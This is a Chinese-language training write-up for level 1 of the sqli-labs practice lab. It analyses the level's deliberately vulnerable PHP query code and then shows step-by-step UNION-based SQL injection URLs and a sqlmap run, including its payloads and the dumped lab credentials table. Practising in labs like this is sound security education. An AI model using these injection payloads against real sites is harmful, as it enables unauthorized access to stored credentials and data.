sqli-labs通关笔记-第01关 GET字符型注入(单引号闭合 手工注入+脚本注入两种方法)

目录

一、字符型注入

二、limit函数

三、源码分析

1、代码审计

2、SQL注入安全分析

二、渗透实战

1、进入靶场

2、注入点分析

（1）SQL语句

（2）注入点id 

3、手工注入

（1）获取列数

（2）获取回显位

（3）获取数据库名

（4）获取表名

（5）获取列名

（6）获取数据

4、sqlmap渗透实战

SQLI-LABS 是一个专门为学习和练习 SQL 注入技术而设计的开源靶场环境，本小节通过手工注入和脚本法共两种方法分别对第01关Less 01基于字符型的SQL注入关卡进行渗透实战。  

一、字符型注入

字符型注入是 SQL 注入的一种类型，攻击者通过在输入字段中插入恶意 SQL 代码来改变原 SQL 语句的逻辑。字符型注入通常发生在SQL 语句使用单引号或者双引号等包裹字符串参数的场景中。攻击者通过闭合单引号或者双引号等符号并注入额外的 SQL 代码，破坏原有语句结构。

二、limit函数

Limit是 SQL 中用于限制查询结果数量的子句，不是真正的函数。Limit通常有两种常见形式，具体如下所示。

• 单参数形式：LIMIT n

  • 返回前 n 条记录

  • 示例：LIMIT 5 返回前5条结果

• 双参数形式：LIMIT offset, count

  • offset：跳过的记录数（从0开始）

  • count：要返回的记录数

  • 示例：LIMIT 10, 5 跳过前10条，返回接下来的5条

举例：SQL语句“SELECT * FROM users WHERE id='$id' LIMIT 0,1”中的LIMIT 0,1"表示获取第一条匹配的记录"，LIMIT0,1的具体含义如下所示，

• 从第0条记录开始（即不跳过任何记录）

• 只返回1条记录

三、源码分析

1、代码审计

本关卡Less01是基于字符型的SQL注入关卡，打开对应的源码index.php，如下所示。

Less01关卡的源码功能是简单基于id的查询页面，详细注释后的源码如下所示。

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title> <!-- 页面标题 -->
</head>

<body bgcolor="#000000"> <!-- 黑色背景 -->
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00"> <!-- 黄色文字 -->

<?php
// 包含MySQL连接参数文件
include("../sql-connections/sqli-connect.php");
// 关闭错误报告
error_reporting(0);

// 获取id参数
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    // 将输入的id记录到result.txt文件中用于分析
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    // 构造SQL查询 - 这里存在SQL注入安全性问题
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    // 注释中展示了可能的注入示例
    // $sql="SELECT * FROM users WHERE id='0' union select 1,2,3 -- ' LIMIT 0,1";
    // $sql="SELECT * FROM users WHERE id='0' union select 1,2,3 # ' LIMIT 0,1";
    
    // 执行查询
    $result=mysqli_query($con1, $sql);
    $row = mysqli_fetch_array($result, MYSQLI_BOTH);
    print($sql); // 打印SQL语句 - 这在实际应用中不安全
    
    if($row)
    {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else 
    {
        echo '<font color= "#FFFF00">';
        print_r(mysqli_error($con1)); // 显示MySQL错误信息
        echo "</font>";  
    }
}
else { 
    echo "Please input the ID as parameter with numeric value"; // 提示输入ID参数
}

?>
</font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center> <!-- 页面底部图片 -->
</body>
</html>

这是一个简单的用户查询页面，主要功能是：

• 通过GET参数id接收用户输入，没有对id进行任何过滤。

• 查询数据库中的users表，返回匹配ID的用户名和密码。

• 将基于id的SQL查询结果显示在页面上。

• 记录所有查询的ID到result.txt文件中。

2、SQL注入安全分析

这个代码存在严重的SQL注入安全问题，原因如下：

• 未过滤的用户输入：直接将$_GET['id']拼接到SQL语句中，没有任何过滤或转义处理。

• 字符串拼接方式：SQL查询使用单引号包裹用户输入(id='$id')，攻击者可以闭合单引号注入恶意代码。

• 错误信息显示：当查询出错时，代码会显示MySQL错误信息，这有助于攻击者进行基于错误的SQL注入。

• SQL语句打印：开发时打印SQL语句有助于调试，但在生产环境中会泄露信息。

二、渗透实战

1、进入靶场

进入sqli-labs靶场首页，其中包含基础注入关卡、进阶挑战关卡、特殊技术关卡三部分有效关卡，如下所示。

http://127.0.0.1/sqli-labs/

其中第1关在基础注入关卡“SQLi-LABS Page-1(Basic Challenges)”中， 点击进入如下页面。

http://127.0.0.1/sqli-labs/#fm_imagemap

点击上图红框的Less01关卡，进入到靶场的第01关卡字符型注入关，页面提示“Please input the ID as parameter with numeric value”，具体如下所示。

http://127.0.0.1/sqli-labs/Less-1/

2、注入点分析

（1）SQL语句

根据源码分析可知，本关卡基于GET方法传入参数id，并未对id进行任何过滤，故而注入点位id。SQL语句的含义是根据用户提供的ID值（字符型）从users表中查询并返回匹配的用户记录的所有字段信息，且仅返回第一条匹配结果，具体代码如下所示。

$id=$_GET['id'];
sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

根据 id='$id'可知闭合方式为单引号，故而SQL注入为字符型注入。

（2）注入点id 

根据上一步我们分析注入点为id，我们首先使用id=1进行探测，完整URL如下所示。

http://127.0.0.1/sqli-labs/Less-1/?id=1

尝试万能注入语句' or 1=1 -- ，如下为完整URL。

http://127.0.0.1/sqli-labs/Less-1/?id=1' or 1=1 --+

此时页面显示“SELECT * FROM users WHERE id='1' or 1=1 -- ' LIMIT 0,1”，如下所示。 

3、手工注入

（1）获取列数

如下所示，order by为3时渗透成功，但是order by为4时提示列不存在，故而共有3列。

http://192.168.59.1/sqli-labs/Less-1/?id=1' ORDER BY 3--+
http://192.168.59.1/sqli-labs/Less-1/?id=1' ORDER BY 4--+

（2）获取回显位

如下所示，回显位为2和3，接下来我们使用第2个回显位进行渗透。

http://192.168.59.1/sqli-labs/Less-1/?id=-1' UNION SELECT 1,2,3--+

（3）获取数据库名

如下所示，数据库的名称为“security”。

http://192.168.59.1/sqli-labs/Less-1/?id=-1' UNION SELECT 1,DATABASE(),3--+

（4）获取表名

如下所示，数据库security共有4个表格，分别为emails,referers,uagents,users。

http://192.168.59.1/sqli-labs/Less-1/?id=-1' UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()--+

（5）获取列名

如下所示，数据库users表的列名分别为id,username,password。

http://192.168.59.1/sqli-labs/Less-1/?id=-1' UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE() and TABLE_NAME='users'--+

（6）获取数据

最后通过上一步获取到的列名来提取users表的内容，如下所示渗透成功。

http://192.168.59.1/sqli-labs/Less-1/?id=-1' UNION SELECT 1,GROUP_CONCAT(CONCAT(username,':',password)),3 FROM users--+

4、sqlmap渗透实战

我们使用sqlmap来进行渗透，参数的含义是获取当前数据库名称（--current-db）并导出所有数据（--dump），全程自动执行无需人工交互（--batch），完整的SQL注入命令如下所示。

sqlmap -u http://192.168.59.1/sqli-labs/Less-1/?id=1 --current-db --dump --batch

sqlmap渗透成功，可以通过联合查询、报错法、布尔盲注、时间盲注四种方法渗透成功，具体信息如下所示。

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3111=3111 AND 'btZk'='btZk

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1' AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(8552=8552,1))),0x7162707871),8552) AND 'mLEo'='mLEo

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 3112 FROM (SELECT(SLEEP(5)))GujM) AND 'jDEn'='jDEn

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3481' UNION ALL SELECT NULL,NULL,CONCAT(0x717a706b71,0x6f744c4b657555545a4f464f59676a44714c684350776b6245716f705369675452674a7753677a64,0x7162707871)-- -
---
[20:52:47] [INFO] fetching current database
current database: 'security'
[20:52:47] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[20:52:47] [INFO] fetching current database
[20:52:47] [INFO] fetching tables for database: 'security'
[20:52:47] [INFO] fetching columns for table 'users' in database 'security'
[20:52:47] [INFO] fetching entries for table 'users' in database 'security'
Database: security
Table: users
[13 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |
| 3  | p@ssword   | Dummy    |
| 4  | crappy     | secure   |
| 5  | stupidity  | stupid   |
| 6  | genious    | superman |
| 7  | mob!le     | batman   |
| 8  | admin      | admin    |
| 9  | admin1     | admin1   |
| 10 | admin2     | admin2   |
| 11 | admin3     | admin3   |
| 12 | dumbo      | dhakkan  |
| 14 | admin4     | admin4   |
+----+------------+----------+